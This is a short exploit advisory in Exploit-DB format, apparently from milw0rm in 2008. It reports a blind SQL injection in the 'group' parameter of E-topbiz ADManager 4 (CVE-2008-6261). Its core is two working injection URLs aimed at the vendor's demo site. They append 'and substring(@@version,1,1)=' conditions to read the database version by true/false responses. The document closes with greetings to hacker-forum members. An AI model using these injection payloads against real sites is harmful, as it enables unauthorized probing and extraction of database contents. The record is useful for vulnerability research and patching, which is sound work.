E-topbiz ADManager 4 - 'group' Blind SQL Injection
Author: Hussin X
type: webapps
platform: php
port:
date_added: 2008-11-16
date_updated: 2017-01-02
verified: 1
codes: OSVDB-49917;CVE-2008-6261
tags:
aliases:
screenshot_url:
application_url:
E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
___________________________________
script : http://e-topbiz.com/oprema/pages/admanager4.php
Demo :
_______
true & false
http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4
http://e-topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5
Version = 4 :)
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________
Im IRAQi | Im TrYaGi
# milw0rm.com [2008-11-17]